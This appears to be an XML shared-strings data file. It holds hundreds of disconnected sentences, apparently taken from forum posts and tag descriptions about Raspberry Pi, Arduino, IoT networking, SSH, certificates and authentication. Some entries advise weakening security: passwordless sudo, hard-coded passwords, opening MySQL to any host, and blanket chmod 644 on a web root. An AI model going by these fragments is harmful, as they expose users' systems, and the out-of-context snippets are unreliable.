    <t>I connected it to an entreprise network , it worked well until i touched to raspi-config ,i changed the password , reactivated ssh(it was already active) .</t>
  </si>
  <si>
    <t>I am developing a door lock using USB RFID and raspberry.</t>
  </si>
  <si>
    <t>Devices like this barcode scanner have special modes to appear as HID devices to iOS.</t>
  </si>
  <si>
    <t>HERE Is my post about this same issue the fix was to setup sudo as passwordless.</t>
  </si>
  <si>
    <t>This time try:
openssl s_client -connect smtp.live.com:587 -starttls smtp -crlf -ign_eof -no_tls1_2
Then: 
ehlo 
auth login
I got an answer immediately.</t>
  </si>
  <si>
    <t>you can validate that ID or change database structure without changing Raspberry Pi application).</t>
  </si>
  <si>
    <t>To my surprise the CH341A SERIAL was recognized correctly and I communication
through "ttyUSB0" worked fine (using pySerial).</t>
  </si>
  <si>
    <t>Most likely you have some problems with SSH-tunneling ( provided you were following the tutorial).</t>
  </si>
  <si>
    <t>For apache on debian the user is www-data, if your webroot is ~/www and you are user pi try these commands
Change owner to apache user recursively
Change Permissions to read for all recursively
chown -R www-data:www-data /home/pi/www
chmod -R 644 /home/pi/www</t>
  </si>
  <si>
    <t>Your bytes are probably not a valid UTF-8 string, so some of the characters get corrupted.</t>
  </si>
  <si>
    <t>(SQLite's main weakness is concurrent access, but that won't be a problem for your application.)</t>
  </si>
  <si>
    <t>So no need to use a program as the Barcode scanner's input is already interpreted correctly.</t>
  </si>
  <si>
    <t>Adding --privileged to my docker run command fixed my issue.</t>
  </si>
  <si>
    <t>There's a problem in synchronisation of the wake-up and capture of the frame, so every first frame after waku-up is corrupted.</t>
  </si>
  <si>
    <t>Alternately, a laptop connected to the same phone hotspot running an SSH client such as Putty can connect to the Pi across the same AP, also headlessly.</t>
  </si>
  <si>
    <t>Try this code and it seemed to work for me...
Basically what this is doing is it is reverting all the files' permission settings back to you, so the .Xauthority file for your account will be yours again.</t>
  </si>
  <si>
    <t>I had a similar problem with a wifi shield + ultrasonic sensor.</t>
  </si>
  <si>
    <t>The code written is basically for edge state detection.</t>
  </si>
  <si>
    <t>First suggestion - changing the login.txt
Instead of using br tags, try inserting "\r\n" between your IDs.</t>
  </si>
  <si>
    <t>I'm trying to do the same thing, it probably linked with the fact that ultralight cards needs no authorization.</t>
  </si>
  <si>
    <t>If you get this error, be aware that there has been a change in the recent versions
File specification for the certificates changed!</t>
  </si>
  <si>
    <t>Everytime you press the push button, you need to read it first and validate this value.</t>
  </si>
  <si>
    <t>Because each device will have an unique token, you will me a lot more flexible than with the before provided answer.</t>
  </si>
  <si>
    <t>This time dropbox appears to have installed correctly (haven't tested it yet), but pip3 is once again corrupted and giving me the same error as before.</t>
  </si>
  <si>
    <t>The solution was to change the CERTIFICATE_ID field to something new so it would generate a new certificate in the keystore and use that to connect.</t>
  </si>
  <si>
    <t>I should also mention that very occasionally, I can get a request recognised on an ATTIny85 when it has a high address but it is rare and again indicates a timing problem.</t>
  </si>
  <si>
    <t>Change the AWSIoTMQTTClient call from
to 
and each of the RPIs will be assigned a unique random client id on connection.</t>
  </si>
  <si>
    <t>Assuming you still have the barcode scanner operational and you got an oscilloscope:
Probe the ribbon cable.</t>
  </si>
  <si>
    <t>Blundell's answer to my question solved the issues
Network: Wi-Fi cannot connect to the internet if Ethernet is also
  connected to a network without internet access.</t>
  </si>
  <si>
    <t>The error could be due to SSL handshake issues with your machine.</t>
  </si>
  <si>
    <t>Anyways if it's a basic Shell access you need to the RPI from the phone, SSH or Telnet can be easy to setup.</t>
  </si>
  <si>
    <t>Your command should be:
pspc myfile.txt pi@192.168.1.3:/home/pi/myfile.txt
You can even hard code your password so that the transfer occurs without prompting.</t>
  </si>
  <si>
    <t>For this you'd also want to take into account the framerate and understand that you can't guarantee person detection for every frame.</t>
  </si>
  <si>
    <t>This known issue has been fixed now.In addition, you can also use Azure CLI to work around for certificate verification.</t>
  </si>
  <si>
    <t>The escape characters etc is a result of double encoding.</t>
  </si>
  <si>
    <t>The problem was solved by removing https from the host.</t>
  </si>
  <si>
    <t>I reduced the delay loop to 100ms and basically observed that data was corrupted on the tick over of every second second.</t>
  </si>
  <si>
    <t>Bluetooth is disabled on the Raspberry Pi 3 due to an invalid hardware configuration.</t>
  </si>
  <si>
    <t>Are you happy to share the config file - just obfuscate any passwords/tokens - and we can look for obvious issues with it.</t>
  </si>
  <si>
    <t>This would be a massive security problem as it would expose every file (including the password files) on the computer!</t>
  </si>
  <si>
    <t>However, we happened to have previous Google accounts that were authenticated prior to this weekend's change.</t>
  </si>
  <si>
    <t>Since the client id can potentially be changed through reversed engineering and changed to be whatever device it wanted to be.</t>
  </si>
  <si>
    <t>The latest insider preview version 10.0.17744.1001 don't have this issue.</t>
  </si>
  <si>
    <t>If your issue is simply getting an access to com port denied by your mono application, then it may be that your user is not in the dialout group.</t>
  </si>
  <si>
    <t>are you able to access the pi using the ddns from within your network, i have used ssh on many  linux computers like this and never had a problem oh and it could also be that your isp is blocking it.</t>
  </si>
  <si>
    <t>The fact that you have to unplug and plug the device to get it working again is indicative of a device driver bug.</t>
  </si>
  <si>
    <t>The MQTT client's user/pass is going to be blank for the user (unused) and the encoded JWT for the password.</t>
  </si>
  <si>
    <t>It might happen due to proxy settings if you are running behind firewall.</t>
  </si>
  <si>
    <t>Actually those are 29-bit identifiers, which you should ideally store in an appropriately sized variable.</t>
  </si>
  <si>
    <t>Dropping SSL encryption completely solved the problem.</t>
  </si>
  <si>
    <t>This will constantly detect key presses and not require enter.</t>
  </si>
  <si>
    <t>If the form has fields in it the user could submit by pressing the Enter key.</t>
  </si>
  <si>
    <t>If it doesn't verify, and gives the same sort of error, you have deeper problems.</t>
  </si>
  <si>
    <t>Anything related to the generation and management of unique identifiers, i.e.</t>
  </si>
  <si>
    <t>avconv is a command-line tool for decoding, encoding, filtering, demuxing, and muxing multimedia.</t>
  </si>
  <si>
    <t>Each value has a unique identifier and a non-unique label, which may be one of the provided labels or one defined by the user.</t>
  </si>
  <si>
    <t>AddressSanitizer (ASAN) is a fast memory error detector for issues such as out-of-bounds access and more.</t>
  </si>
  <si>
    <t>Automatic License Plate Recognition library</t>
  </si>
  <si>
    <t>The Crypto Token Kit framework provides native support for smart cards</t>
  </si>
  <si>
    <t>Keywords are special words used as identifiers by a language.</t>
  </si>
  <si>
    <t>A situation in which two or more identifiers within a given scope cannot be unambiguously resolved.</t>
  </si>
  <si>
    <t>A CLSID is a globally unique identifier that identifies a COM class object.</t>
  </si>
  <si>
    <t>Traditional security issues which plagued the original chroot(2) design will not affect FreeBSD jails.</t>
  </si>
  <si>
    <t>The copy is locked, but the original assembly file is unlocked and can be updated.</t>
  </si>
  <si>
    <t>Each uploaded resource is assigned a unique Public ID.</t>
  </si>
  <si>
    <t>The proper output of a barcode determines its legibility for scanning devices.</t>
  </si>
  <si>
    <t>nude.js is a JavaScript implementation of a nudity scanner based which uses HTML  to analyse image data and return whether or not nudity was detected.</t>
  </si>
  <si>
    <t>Alternately, Authentication may be implemented with Smart Cards, an Authentication Server or even a Public Key Infrastructure.</t>
  </si>
  <si>
    <t>Another common approach is to say that you have "forgotten" the password and then change it.</t>
  </si>
  <si>
    <t>Express Checkout exists to allow you to accept PayPal as a payment option in your checkout system.</t>
  </si>
  <si>
    <t>FileVault encodes the information stored on your Mac so that it cant be read unless the login password is entered.</t>
  </si>
  <si>
    <t>See also:
JSONDecoder documentation
Encoding and Decoding Custom Types
Decodable
Codable
jsonencoder
JSONSerialization</t>
  </si>
  <si>
    <t>Repository Manager - to assign permissions to users and groups and manage folders.</t>
  </si>
  <si>
    <t>It provides additional detectors to SpotBugs which has only few detectors dedicated to security by default.</t>
  </si>
  <si>
    <t>AMD's XOP (a revision of their SSE5 plans) was never picked up by Intel, and will be dropped even by future AMD designs.</t>
  </si>
  <si>
    <t>Although 2D systems use a variety of symbols, they are generally referred to as barcodes as well.</t>
  </si>
  <si>
    <t>The disclosure button is always momentary and doesnt affect the actual selection.</t>
  </si>
  <si>
    <t>Repository Manager to assign permissions to users and groups and manage folders.</t>
  </si>
  <si>
    <t>As of February 2015, over 100,000 merchants and vendors accepted bitcoin as payment.</t>
  </si>
  <si>
    <t>When decoding a keyed archive, because values are requested by name, values can be decoded out of sequence or not at all.</t>
  </si>
  <si>
    <t>Each object stored in an NSDictionary can be retrieved by a unique key assigned to it.</t>
  </si>
  <si>
    <t>Easier semantics: all fake objects are just that  fakes.</t>
  </si>
  <si>
    <t>Yes I performed with SUDO privileges so that's not the problem :-/
Also, this is sort of out of curiousity:
in the code is says "delayMicroseconds" and the variable "nPulseLength" is set to 300.</t>
  </si>
  <si>
    <t>I intend to make a motor run based on face detection.</t>
  </si>
  <si>
    <t>I looking to make a web app that has a login page and has 1 button and a image of a LED that will flash.</t>
  </si>
  <si>
    <t>As a result I received an Access Denied message because I had basically forgotten my password.</t>
  </si>
  <si>
    <t>Both are short, because the terminal uses a touch interface and security is not extremly important for the use case.</t>
  </si>
  <si>
    <t>The problem is that the script does not even want to write the name of the logged-in user stored in session.</t>
  </si>
  <si>
    <t>I can't figure out why this is happening, and I'm concerned there is some corruption or issues in sending data.</t>
  </si>
  <si>
    <t>It looks like the hardware hangs badly and I need to cut power (can't even login again with putty), Ctrl+z/x/c also don't work.</t>
  </si>
  <si>
    <t>I have confirmed the proxy works and that the certificate is recognized by Windows 10 after adding it to the store.</t>
  </si>
  <si>
    <t>I am trying to understand what is the best way to handle this problem, without causing any concurrent access issues.</t>
  </si>
  <si>
    <t>Make sure you check/repair the permissions for the drive or folder you're sharing.</t>
  </si>
  <si>
    <t>.NET interface representing an HTML-encoded string that should not be encoded again.</t>
  </si>
  <si>
    <t>If you don't have a Windows Live ID, we'll walk you through creating one when you sign in on your phone.</t>
  </si>
  <si>
    <t>Then fetch batches of detailed contacts by those unique identifiers.</t>
  </si>
  <si>
    <t>Edit: The problem was not a missing permission but an incorrectly assumed working directory and is now solved.</t>
  </si>
  <si>
    <t>Ideally it would make everything "private"(only accessible when on the home network) except phpmyadmin and the MySQL databases.</t>
  </si>
  <si>
    <t>I know this can be done in linux with the authorized_keys file in the .ssh folder and changing the configuration file to allow such login method... Is there an equivalent procedure for Widnows Core IoT?</t>
  </si>
  <si>
    <t>If I go back to the settings and select my wifi network it has the "Connect Automatically" box checked but when I click connect it asks me again for the password...</t>
  </si>
  <si>
    <t>After running JPS: I have noticed that all of the correct processes are running on the master node, however I am having an error on the Datanode for which the log shows:
ExitCodeException exitCode=1: chmod: changing permissions of '/opt/hadoop_tmp/hdfs/datanode': Operation not permitted.</t>
  </si>
  <si>
    <t>While verifying the changes check if the device is unlocked: https://msdn.microsoft.com/library/windows/apps/xaml/dn706236.aspx.</t>
  </si>
  <si>
    <t>In this case when i scanned my collage identity tag with RFID reader i got an Authentication failed () :communication error</t>
  </si>
  <si>
    <t>thunar-shares-plugin
gvfs-smb
After installing the dependencies, the first time I tried to open a file I had to login using my username &amp; password I had used in my raspberry pi while setting up the samba server.</t>
  </si>
  <si>
    <t>Unless you can guarantee where in the current document the user is, it makes sense to try and use unique ACCESSKEY settings for links.</t>
  </si>
  <si>
    <t>I want to be able to back up my work, is it possible that I can copy KURA files on another location so in case the SD card get corrupted I manage to have it work again fast without the need to re-install and reconfigure it from zero.</t>
  </si>
  <si>
    <t>Windows Hello is a Windows 10 feature, which allows you to sign in using bio-metric data like fingerprints or facial recognition.</t>
  </si>
  <si>
    <t>There are two reasons why i think this problem is occurring :-
Probably the data is getting corrupted while getting transmitted, so might have to implement some error check method (eg: checksum), and request again for data if that is the case.</t>
  </si>
  <si>
    <t>enter image description hereBecause of the additional information in the code which I thought did not affect the code ... but the solution is to scan everything in the code to verify its validity ..</t>
  </si>
  <si>
    <t>While often used to prevent a query from blocking other queries it also makes it susceptible to dirty reads and other potential data issues.</t>
  </si>
  <si>
    <t>It connects to any computer (USB) and embeds a secure OLED display to double-check and confirm each transaction with a single tap on its side buttons.</t>
  </si>
  <si>
    <t>As the business evolves and roles need to be modified, the administrator makes changes to the authorization policy; the underlying business application does not need to be changed.</t>
  </si>
  <si>
    <t>The module allows you to save historical changes (CRUD operations) made on your persistent entities in audit specific tables that are created by Envers automatically.</t>
  </si>
  <si>
    <t>Anyway as a workaround to do this you can install Network manager (supports all debian distributions including ubuntu/raspbian/etc)
And then add required network configuration to  folder.</t>
  </si>
  <si>
    <t>But even just using a different access point/password combo onto the same network allows a stricter policy on that AP
Again, this may seem like overkill for your use-case, and I agree in quick test situations, but if you're serious about network security and you want to free the Things, it's the better way to go - long term.</t>
  </si>
  <si>
    <t>Here's my Processing code:
Here's my error:
IllegalAccessError: tried to access class processing.core.PApplet$RegisteredMethods from class cc.arduino.Arduino$SerialProxy
Since my error apparently has to do with access permissions, I tried doing what it says at the tutorial page I was following by going to /var/lock folder, but the /lock folder doesn't exist!</t>
  </si>
  <si>
    <t>Alt+F4 isn't a major concern (though it would be really nice to get rid of) because when Chromium crashes nodm will automatically restart it and it handles the Alt+F4 somewhat reasonably (black screen, flashing white, then it's back up - it's not a security concern just a severely ugly "feature" people might stumble accross).</t>
  </si>
  <si>
    <t>I would like to access my Google Calendar and display coming events, but all code I can find needs user to fill-in OAuth screen, what is impossible as device will not have any input (keyboard, mouse atc)
Is it possible to authenticate on the other computer and then get some token, file or whatever to incorporate it into my application, so it can log-in without any pop-ups?</t>
  </si>
  <si>
    <t>other less secure option is to rely on the Phone (Android and IOS phones doesn't generally Allow a higher layer connection without encryption/pairing) and try to establish an SPP connection to the phone.</t>
  </si>
  <si>
    <t>And third hardest option must most versatile is needed if you do not have access to routers setup page (they are password protected) and cannot set port forwarding, then you must create server application on some server that is visible from internet and has public IP.</t>
  </si>
  <si>
    <t>It provides front-end elements for presenting address and payment information stored in the Amazon account, and a back-end API to issue operations such as authorizing or capturing a payment.</t>
  </si>
  <si>
    <t>The reason is Oracle 11g &amp; above, by default support case sensitive passwords, as opposed to previous versions where all passwords were set to upper case.</t>
  </si>
  <si>
    <t>If you don't hear anything you should check if the user that the webserver uses to run is allowed to access the audio device (Lots of linux distributions limit access to the audio device to a special group of users)</t>
  </si>
  <si>
    <t>Fingerprint is scanned, Java uploads the image to the server over https, gets back a one-time key (for valid scans) or a message indicating an invalid scan.</t>
  </si>
  <si>
    <t>As I write this, the fingerprint is currently:
Be aware that this can change with time (or even depending on the specific server which handles your request), so you may need to change it.</t>
  </si>
  <si>
    <t>Yesod leverages Haskell's type system to turn runtime bugs into compule-time errors, for example to avoid XSS attacks or character encoding issues.</t>
  </si>
  <si>
    <t>While hacks are not generally viewed as good, their association with quick-and-dirty "super-hero" programming has given them a romantic air.</t>
  </si>
  <si>
    <t>Board: Arduino UNO Rev 3
NFC Shield: v2.0b by Seeed Studio
So when a NFC tag is present a signal turns a servo 180 degrees to unlock the door.</t>
  </si>
  <si>
    <t>I try to enroll the endpoint to the server, and I am able to reach the login page, but as soon as I enter the correct credentials, I see message saying an unexpected error has occurred.</t>
  </si>
  <si>
    <t>Can anyone please show the procedure to install SDK on Raspberry Pi 3 for Automatic license plate recognition?</t>
  </si>
  <si>
    <t>IMHO Arduino (including the DUE) is the wrong tool for heavy and/or encrypted web based communication.</t>
  </si>
  <si>
    <t>This tag refers to the process of setting a new password on a system, thereby making the old password obsolete and no longer usable.</t>
  </si>
  <si>
    <t>For example, if a mobile phone is stolen, the owner can call
  his or her network provider and instruct them to "blacklist" the phone
  using its IMEI number.</t>
  </si>
  <si>
    <t>I am making this code to run as a background application but I know that after a few seconds, when the RPi is initializing, it asks for an username and a password in order to initialize the session.</t>
  </si>
  <si>
    <t>But I am unable to connect to Note 4 Bluetooth it get paired using password 1234 but never able to connect and show up on Terminal on my android.</t>
  </si>
  <si>
    <t>If you go the latter route, it would be a good coding experience to write your own software that encrypts files and then de-crypts them when a key is entered.</t>
  </si>
  <si>
    <t>TwitPic uses usernames and passwords from Twitter
Comments to photographs are sent as reply tweets
TwitPic URLs are already short, making it unnecessary to use URL shortening</t>
  </si>
  <si>
    <t>If you have multiple submit buttons where one (such as "save") needs to bypass validation but still needs to submit the form data, use class="cancel" on the button.</t>
  </si>
  <si>
    <t>Here I found someone with the same problem, but I couldn't figure out what I should try now, I've tried installing .Net core 2 in many shady ways, but the walkthroughs I tried didn't seem to work
Is there any way to fix this?</t>
  </si>
  <si>
    <t>The encryption works just fine though (but i think the Encoding part is not coming out correctly since its the same as the Base64 encoding?).</t>
  </si>
  <si>
    <t>I haven't added the verification part yet but that will be somewhere in the code eventually and it will change the pin value to 0 or 1 if PIN is entered.</t>
  </si>
  <si>
    <t>I have also ran a different code without the edge detection which always seems to work just fine and play back perfectly everytime.</t>
  </si>
  <si>
    <t>However the fastest solution would be a fingerprint button linked safely to Pi Face.</t>
  </si>
  <si>
    <t>In the device using MQTT case, there's no API auth, it's using the JWT to authenticate in that instance, but for the admin SDK, you need to authenticate with the Cloud Project in order to issue those sorts of admin commands.</t>
  </si>
  <si>
    <t>With Mac OS X Lion, an app can take advantage of the same API used in iOS to push badge numbers, sounds or notifications to applications running on Mac OS X.</t>
  </si>
  <si>
    <t>EDIT
The following directories have all of the access rules, so no security issues could happen.</t>
  </si>
  <si>
    <t>The alarm1 thread should always be running and i will be using RFID cards to activate/deactivate
code below:</t>
  </si>
  <si>
    <t>The SD card is accessed correctly and the Ethernet board responds to ping requests.</t>
  </si>
  <si>
    <t>I now want to start the application directly after booting, so that there is no need for entering username ,passwort and starting the application.</t>
  </si>
  <si>
    <t>I want to:
Setup a local server @ my office,
Problem :
I dont want anyone to get access to my php/mysql files.</t>
  </si>
  <si>
    <t>For debugging purposes I am using an X Windows server on my PC and SSH tunneling X through Putty.</t>
  </si>
  <si>
    <t>I don't need high security, rather I just don't want to be spammed if a web crawler or random person enters the URL.</t>
  </si>
  <si>
    <t>But my code still have problem, it can't recognise knock and the LED acting weird.</t>
  </si>
  <si>
    <t>Is there any way to get the user to enter the password once and store it in a variable and supply this to the passwd command?</t>
  </si>
  <si>
    <t>It seems likely that there might be some sort of firewall issue on either the Android side of the Pi side.</t>
  </si>
  <si>
    <t>What's happening is the script essentially runs twice when the particular card number is identified.</t>
  </si>
  <si>
    <t>2) An Android App that receives the unique code (Sent by the microcontroller) every time a card is processed by the hardware device.</t>
  </si>
  <si>
    <t>If I enter invalid characters it loops back to top of while.</t>
  </si>
  <si>
    <t>I'm currently new to web development and was doing some research on a safe way to store user's passwords.</t>
  </si>
  <si>
    <t>Problem: I am unable to see the webserver from another machine on the local network despite being able to ping and SSH into the PI.</t>
  </si>
  <si>
    <t>For the first module it connects in STATIONAP mode to my work wifi, and creates its own network with SSID nodeMCUwifi, with a basic password of 10 characters "1234567890".</t>
  </si>
  <si>
    <t>I am trying to have my raspberry pi initiate a pairing request to a cell phone via bluetooth.</t>
  </si>
  <si>
    <t>They both work fine when run alone but if I try to access the pin 22 while the 23 is being monitored the 23 reads a RISING although I have NOT pressed the button.</t>
  </si>
  <si>
    <t>My current sudoers file is as follows:
Why am I still being prompted to enter a password when trying to access the GPIO pin 174?</t>
  </si>
  <si>
    <t>It's extremely strange as far as until now, for a long time there was no problem accessing it through SSH.</t>
  </si>
  <si>
    <t>i plug it in with the correct connections and i have found sample codes over the internet but it doesn't work.</t>
  </si>
  <si>
    <t>After typing the following commands, what should I enter when it asks for host password?</t>
  </si>
  <si>
    <t>I am facing issues with the generated key difference in both encrypted implementations.</t>
  </si>
  <si>
    <t>I'm aware that Apple does require some sort of BT hardware approval which I wont have I'll be using generic BT hardware.</t>
  </si>
  <si>
    <t>I have used XCTU to configure the Xbee to connect to an Access point (a samsung mobile phone) and verified that it is connected by checking the phone.</t>
  </si>
  <si>
    <t>The share has permission "everyone" full access
i have tried cifs with no luck, but if i type this into a terminal window
It asks me for my password.</t>
  </si>
  <si>
    <t>The other computer is not listed in my local network, but I do have the IP, as well as the credentials of an user with the necessary username and password.</t>
  </si>
  <si>
    <t>The problem is, our open "no-auth" wifi has one of those "terms of use" buttons you have to click in a browser before you are connected.</t>
  </si>
  <si>
    <t>My main problem is getting the Aot device recognised on the host and load the app onto it.</t>
  </si>
  <si>
    <t>I've tried keeping the owner of the home folder as root:root and changed all the permissions to files below to user:sftp but that doesnt work.</t>
  </si>
  <si>
    <t>Changing the directroy and all files in it with sudo chown -R www-data:www-data &lt;root of site&gt; I managed to set the correct permissions.</t>
  </si>
  <si>
    <t>I've currently got a program where you have to enter a preset passcode on the remote, which then unlocks the alarm on the Arduino.</t>
  </si>
  <si>
    <t>BUILD FAILED
Total time: 59.558 secs
I have confirmed that it's not a permission issue.</t>
  </si>
  <si>
    <t>I want the program to be for security: If my door is open for too long (my door has a magnetic sensor), the buzzer will buzz.</t>
  </si>
  <si>
    <t>Due to IBM doesn't provide free plan for IBM Blockchain anymore, I come up with with solution to integrate Watson IOT to Hyperledger Fabric instead of IBM Blockchain.</t>
  </si>
  <si>
    <t>It currently looks like this with the information entered:
Nothing other than the host, access key, or access secret have been touched, and I removed them here.</t>
  </si>
  <si>
    <t>Unfortunately I am new to SSL and certificates and only have a basic understanding so I'm not exactly sure what the true underlying issue is.</t>
  </si>
  <si>
    <t>I've tried generating new certificates and creating a new x509 self signed device, but it was running into the same issues as well :(  
Hope someone out there can help!</t>
  </si>
  <si>
    <t>smbclient -L \\\\AASERVER-1 --user=AASERVER-1/Administrator%REDACTEDPASSWORD -W workgroup
Note: the \ characters in '\\AASERVER-1' have to be escaped to be passed as arguments, thus the \\ \\ at the beginning.</t>
  </si>
  <si>
    <t>I'm working on a university project combining MQTT and Face recognition, using a raspberry pi.</t>
  </si>
  <si>
    <t>This is the SSH command contained within a shell script -
Can anybody give me an idea why the script is not behaving as I would like via SSH and if possible offer a solution.</t>
  </si>
  <si>
    <t>Im not just trying to solve it on my machine by trusting the website or something, I'm trying to find a solution that solves it for anybody that tries to connect.</t>
  </si>
  <si>
    <t>As i thought it would be enough for me to build firmware and upload it to my STM32F4Discovery, but i`ve got an issue.</t>
  </si>
  <si>
    <t>I want it to send out SMS alerts when a detection event happens.</t>
  </si>
  <si>
    <t>I am trying to add the option to change the wi-fi password, but that part of the form does not seem to be available to the code.</t>
  </si>
  <si>
    <t>I found how to make a request with a certain certificate, my trouble is that I don't find the one used automatically by the OS.</t>
  </si>
  <si>
    <t>I have browsed over the internet for hours and tried different codes but still can not figure out how to solve this problem.</t>
  </si>
  <si>
    <t>On my research I found this  code to fool the captive into thinking I have an internet connection!</t>
  </si>
  <si>
    <t>I gave both servers authorized keys, so I don't have to enter a password if I execute the script.</t>
  </si>
  <si>
    <t>I am getting Corrupt JPEG data: 1 extraneous bytes before marker 0xd3 error while using functions of opencv as mentioned in the code section.</t>
  </si>
  <si>
    <t>I want To create face detection app for Raspberry pi3b (raspbian) by .net core 2.2.</t>
  </si>
  <si>
    <t>The authentication id is supposed to be changed by a super-user using communication through Serial Protocol.</t>
  </si>
  <si>
    <t>But practically, any system capable of doing that would be capable of decoding and re-encoding the jpeg within reasonable time.</t>
  </si>
  <si>
    <t>Debugging an embedded device is a lot harder, and you're still producing quite a few bugs.</t>
  </si>
  <si>
    <t>As I was much more of a noob when I first approached this problem about a year ago, it is clearly much easier to SSH into the Arduino and writing the script in vi and saving the the linux side of the yun.</t>
  </si>
  <si>
    <t>Fragment base-64-authorization should be represented by Base 64
  encoded username:password string.</t>
  </si>
  <si>
    <t>When I reformatted the hard-drive, the UUID for it changed, invalidating my config in /etc/fstab.</t>
  </si>
  <si>
    <t>Syntax for connecting mysql is 
MySQLdb.connect(host,userName,passWord,databaseName,port)
Still if its not accessible then , 
You need to change mysql server access settings from localhost to "*".</t>
  </si>
  <si>
    <t>If you are using some other ssh client; putty, etc..  change the 'ssh' in the command field to match your setup.</t>
  </si>
  <si>
    <t>This is the part you're having trouble with:
After you send the password you're waiting 30 seconds for  to appear, but it might not appear if you've connected to that machine before.</t>
  </si>
  <si>
    <t>Hardware AEC is not reliable and it is not implemented/supported by lots of hardware even if they report it otherwise.</t>
  </si>
  <si>
    <t>On standard Linux based system (RedHat Ubuntu of else) there is usually a login window that allows to change the window manager you use (usually provided by gdm or kdm)</t>
  </si>
  <si>
    <t>Once that is applied the project will build correctly you can start hacking the sample files.</t>
  </si>
  <si>
    <t>Reading around I found that could be an issue with network, the SD card R/W speeds or even the SSH configuration itself, nothing that I tried of what I found around worked for me which was quite disappointing.</t>
  </si>
  <si>
    <t>Keep in mind that unfortunately it is a bit more intricate than that and you will have to do a lot of research to find out how routing or proxies actually work.</t>
  </si>
  <si>
    <t>These websites are nice for their free-text or identifier searches.</t>
  </si>
  <si>
    <t>Since you don't specify the password option correctly, you're effectively passing NO password to mysqladmin, and it doesn't log you in.</t>
  </si>
  <si>
    <t>You have IMSI inside the SIM card and this IMSI binded with your phone number and an authentication key named Ki in the network operator's databases.</t>
  </si>
  <si>
    <t>It's a perfectly acceptable solution combined with SSL as you already said you're using (so the password gets encrypted).</t>
  </si>
  <si>
    <t>So weve provided a simple mechanism
  for enabling SSH before an image is booted.</t>
  </si>
  <si>
    <t>Please confirm you are passing the correct authentication token that was generated when you registered the device.</t>
  </si>
  <si>
    <t>Basically, SnoopyPro allows you to intercept, display, record and analyze the USB protocol and all transferred data between any USB device connected to your PC and applications.</t>
  </si>
  <si>
    <t>If you build a firmware with debug enabled you'll likely see messages similar to the one reported in that issue.</t>
  </si>
  <si>
    <t>By default MySQL Server on Ubuntu run on the local interface, This means remote access to the MySQL Server is not Allowed.</t>
  </si>
  <si>
    <t>I don't know the  library, but when using HTTP basic authentication it is not enough to simply concatenate the username, a colon, and a password.</t>
  </si>
  <si>
    <t>There is a massive specification behind the KNX bus which deals with so many problems from device addresses to collision detection.</t>
  </si>
  <si>
    <t>the bundled shaders just use one material RGB value for the whole Shape, you want to specify a different colour for each sphere which would need a hacked shader (easy to do if you're used to hacking shaders) where you specify the RGB value in the texture coordinate fields of the buffer array.</t>
  </si>
  <si>
    <t>I'm going to guess that this is because the mutual authentication between your app and RabbitMQ failed due to the server certificate not matching.</t>
  </si>
  <si>
    <t>You can easily find code example here
So basically:
Pre hard code credentials (can be dummy data for first run) to the EEPROM.</t>
  </si>
  <si>
    <t>To upload the certificate successfully it needs to be a Base-64 encoded *.cer and not a DER encoded binary *.cer.</t>
  </si>
  <si>
    <t>Q: When I open the GPIO control app on the Android when I press + button and enter the token (esp8266); But not any endpoint found.</t>
  </si>
  <si>
    <t>I can't guess the expected behavior of Apt in this situation or what password it might have selected.</t>
  </si>
  <si>
    <t>But since there are even more things that can go wrong, here is some more information:
Connecting via bluetooth to the HC-05 required using the default password "1234".</t>
  </si>
  <si>
    <t>@RamithDR
I was facing the same issue and then have added iot full access policy ,then it starts working.</t>
  </si>
  <si>
    <t>The foolproof and robust solution is to use 74HCx series gate, however this comes with a lot of redundant wires.</t>
  </si>
  <si>
    <t>Typically a barcode scanner will act as a HID, so it appears to type out the number and press enter wherever you scan something.</t>
  </si>
  <si>
    <t>Use keyword spotting mode, you can configure threshold for each word and they will be properly detected.</t>
  </si>
  <si>
    <t>Initially I thought there were a problem with a pointers, particularly in A::myPublicMethod, that creates *ptr, that then being transferred to A::privateMethod1 to store in vect1.</t>
  </si>
  <si>
    <t>So even if the MIC somehow validated, then the derived keys will not match the keys known to the server, basically rendering the device useless without it knowing it.</t>
  </si>
  <si>
    <t>As a tester tool you can read the trouble codes but you can't hack it to simulate the Ignition signal etc...</t>
  </si>
  <si>
    <t>The value can be a comma-separated list of a resource names or resource unique identifiers.</t>
  </si>
  <si>
    <t>Just go and Sign up Here https://insider.windows.com/en-us/ 
After Signup, you can get all windows insider build OS, SDK, Tools</t>
  </si>
  <si>
    <t>A candlestick-chart is a type of bar-chart which is primarily used to indicate change in price of security, currency etc.</t>
  </si>
  <si>
    <t>ISO-19794 is used to Biometric data interchange formats which has the concept of face recognition.</t>
  </si>
  <si>
    <t>Facebook Payments is the exclusive payments provider for Games on Facebook.</t>
  </si>
  <si>
    <t>A dictionary-attack is a one in which the attacker guesses a subset of the allowed input values based on assumptions about likely keys (e.g.</t>
  </si>
  <si>
    <t>Mobile Posse is revolutionizing app engagement on the most valuable real estate on mobile phones - the home and lock screens.</t>
  </si>
  <si>
    <t>They support iDEAL, credit card, PayPal, and Bitcoin, among other options.</t>
  </si>
  <si>
    <t>.Net implementation of an Excel file reader for reading unencrypted Excel 97 and up BIFF and XLSX based files</t>
  </si>
  <si>
    <t>Its focus is on using the built-in camera on mobile phones to scan and decode barcodes on the device, without communicating with a server, though the library also supports use on a server.</t>
  </si>
  <si>
    <t>A password vault is a program that stores encrypted passwords that can be accessed using a master password.</t>
  </si>
  <si>
    <t>Aadhaar  is a 12 digit unique-identity number issued to all Indian residents based on their biometric and demographic data.</t>
  </si>
  <si>
    <t>The Common Access Card (CAC) is a United States Department of Defense (DoD) smart card, used for email signing, authentication, and access to DoD computers and networks.</t>
  </si>
  <si>
    <t>The process of circumventing security features in hacking, or taking a different approach to an issue in troubleshooting.</t>
  </si>
  <si>
    <t>A UUID (Universally Unique IDentifier) is an identifier that is created with the intent of being, as the name suggests, universally unique.</t>
  </si>
  <si>
    <t>One time passwords are designed as single use passwords which expire after use.</t>
  </si>
  <si>
    <t>In Mac OS X, keychain files are stored in ~/Library/Keychains/, /Library/Keychains/, and /Network/Library/Keychains/, and the Keychain Access GUI application is located in the Utilities folder in the Applications folder.</t>
  </si>
  <si>
    <t>It is frequently used as an input method to enter Chinese characters into computers.</t>
  </si>
  <si>
    <t>This is in contrast to hardware tokens, where the credentials are stored on a dedicated hardware device.</t>
  </si>
  <si>
    <t>XDMCP can be considered as graphical telnet protocol and it shares the same security problem of unencrypted authentication.</t>
  </si>
  <si>
    <t>In Ruby, Faker, a port of Data::Faker from Perl, is used to easily generate fake data: names, addresses, phone numbers, etc.</t>
  </si>
  <si>
